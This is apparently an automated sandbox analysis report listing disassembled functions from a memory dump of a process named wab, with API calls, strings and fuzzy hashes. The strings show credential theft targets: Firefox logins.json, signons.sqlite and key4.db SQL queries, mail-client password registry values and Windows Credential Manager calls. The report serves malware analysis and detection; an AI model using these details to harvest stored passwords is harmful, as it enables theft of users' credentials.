                    • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                    • API String ID: 4171719235-3943159138
                    • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                    • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                    • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                    • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                    Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                    • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                    • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                    • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                    • GetWindowRect.USER32(00000000,?), ref: 0041047C
                    • GetWindowRect.USER32(?,?), ref: 00410487
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                    • GetDC.USER32 ref: 004104E2
                    • strlen.MSVCRT ref: 00410522
                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                    • ReleaseDC.USER32(?,?), ref: 00410580
                    • sprintf.MSVCRT ref: 00410640
                    • SetWindowTextA.USER32(?,?), ref: 00410654
                    • SetWindowTextA.USER32(?,00000000), ref: 00410672
                    • GetDlgItem.USER32(?,00000001), ref: 004106A8
                    • GetWindowRect.USER32(00000000,?), ref: 004106B8
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                    • GetClientRect.USER32(?,?), ref: 004106DD
                    • GetWindowRect.USER32(?,?), ref: 004106E7
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                    • GetClientRect.USER32(?,?), ref: 00410737
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                    • String ID: %s:$EDIT$STATIC
                    • API String ID: 1703216249-3046471546
                    • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                    • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                    • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                    • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                    Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004024F5
                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                    • _mbscpy.MSVCRT ref: 00402533
                    • _mbscpy.MSVCRT ref: 004025FD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscpy$QueryValuememset
                    • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                    • API String ID: 168965057-606283353
                    • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                    • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                    • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                    • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                    Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00402869
                      • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                    • _mbscpy.MSVCRT ref: 004028A3
                      • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                    • _mbscpy.MSVCRT ref: 0040297B
                      • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                    • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                    • API String ID: 1497257669-167382505
                    • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                    • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                    • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                    • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                    Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                    • GetDlgItem.USER32(?,000003EE), ref: 00401103
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                    • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                    • LoadCursorA.USER32(00000067), ref: 0040115F
                    • SetCursor.USER32(00000000,?,?), ref: 00401166
                    • GetDlgItem.USER32(?,000003EE), ref: 00401186
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                    • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                    • SetBkMode.GDI32(?,00000001), ref: 004011B9
                    • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                    • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                    • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                    • EndDialog.USER32(?,00000001), ref: 0040121A
                    • DeleteObject.GDI32(?), ref: 00401226
                    • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                    • ShowWindow.USER32(00000000), ref: 00401253
                    • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                    • ShowWindow.USER32(00000000), ref: 00401262
                    • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                    • memset.MSVCRT ref: 0040128E
                    • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                    • String ID:
                    • API String ID: 2998058495-0
                    • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                    • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                    • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                    • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                    Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmp$memcpy
                    • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                    • API String ID: 231171946-2189169393
                    • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                    • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                    • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                    • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                    Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscat$memsetsprintf$_mbscpy
                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                    • API String ID: 633282248-1996832678
                    • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                    • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                    • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                    • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                    Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • key4.db, xrefs: 00406756
                    • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                    • , xrefs: 00406834
                    • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memcmp$memsetstrlen
                    • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                    • API String ID: 3614188050-3983245814
                    • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                    • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                    • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                    • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                    Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: sprintf$memset$_mbscpy
                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                    • API String ID: 3402215030-3842416460
                    • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                    • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                    • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                    • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                    Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                      • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                      • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                      • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                      • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                      • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                      • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                      • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                    • strlen.MSVCRT ref: 0040F139
                    • strlen.MSVCRT ref: 0040F147
                    • memset.MSVCRT ref: 0040F187
                    • strlen.MSVCRT ref: 0040F196
                    • strlen.MSVCRT ref: 0040F1A4
                    • memset.MSVCRT ref: 0040F1EA
                    • strlen.MSVCRT ref: 0040F1F9
                    • strlen.MSVCRT ref: 0040F207
                    • _strcmpi.MSVCRT ref: 0040F2B2
                    • _mbscpy.MSVCRT ref: 0040F2CD
                    • _mbscpy.MSVCRT ref: 0040F30E
                      • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                    • String ID: logins.json$none$signons.sqlite$signons.txt
                    • API String ID: 1613542760-3138536805
                    • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                    • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                    • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                    • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                    Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                    • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                    • API String ID: 1012775001-1343505058
                    • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                    • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                    • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                    • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                    Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00444612
                      • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                    • strlen.MSVCRT ref: 0044462E
                    • memset.MSVCRT ref: 00444668
                    • memset.MSVCRT ref: 0044467C
                    • memset.MSVCRT ref: 00444690
                    • memset.MSVCRT ref: 004446B6
                      • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                      • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                    • memcpy.MSVCRT ref: 004446ED
                      • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                      • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                    • memcpy.MSVCRT ref: 00444729
                    • memcpy.MSVCRT ref: 0044473B
                    • _mbscpy.MSVCRT ref: 00444812
                    • memcpy.MSVCRT ref: 00444843
                    • memcpy.MSVCRT ref: 00444855
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset$strlen$_mbscpy
                    • String ID: salu
                    • API String ID: 3691931180-4177317985
                    • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                    • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                    • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                    • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                    Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                    • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$Library$FreeLoad
                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                    • API String ID: 2449869053-232097475
                    • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                    • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                    • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                    • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                    Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                    Download Yara Rule
                    APIs
                    • sprintf.MSVCRT ref: 0040957B
                    • LoadMenuA.USER32(?,?), ref: 00409589
                      • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                      • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                      • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                      • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                    • DestroyMenu.USER32(00000000), ref: 004095A7
                    • sprintf.MSVCRT ref: 004095EB
                    • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                    • memset.MSVCRT ref: 0040961C
                    • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                    • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                    • DestroyWindow.USER32(00000000), ref: 0040965C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                    • String ID: caption$dialog_%d$menu_%d
                    • API String ID: 3259144588-3822380221
                    • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                    • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                    • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                    • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                    Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                    • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                    • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                    • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                    • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$Library$FreeLoad
                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                    • API String ID: 2449869053-4258758744
                    • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                    • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                    • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                    • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                    Function 0040F802 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 118registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                    • memset.MSVCRT ref: 0040F84A
                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                    • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                    • LocalFree.KERNEL32(?), ref: 0040F92C
                    • RegCloseKey.ADVAPI32(?), ref: 0040F937
                    • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                    • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                    • String ID: Creds$ps:password
                    • API String ID: 551151806-1872227768
                    • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                    • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                    • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                    • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                    Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                    Download Yara Rule
                    APIs
                    • wcsstr.MSVCRT ref: 0040426A
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                    • _mbscpy.MSVCRT ref: 004042D5
                    • _mbscpy.MSVCRT ref: 004042E8
                    • strchr.MSVCRT ref: 004042F6
                    • strlen.MSVCRT ref: 0040430A
                    • sprintf.MSVCRT ref: 0040432B
                    • strchr.MSVCRT ref: 0040433C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                    • String ID: %s@gmail.com$www.google.com
                    • API String ID: 3866421160-4070641962
                    • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                    • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                    • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                    • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                    Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                    Download Yara Rule
                    APIs
                    • _mbscpy.MSVCRT ref: 00409749
                    • _mbscpy.MSVCRT ref: 00409759
                      • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                      • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                      • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                    • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                    • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                    • _mbscpy.MSVCRT ref: 004097A1
                    • memset.MSVCRT ref: 004097BD
                    • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                    • String ID: TranslatorName$TranslatorURL$general$strings
                    • API String ID: 1035899707-3647959541
                    • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
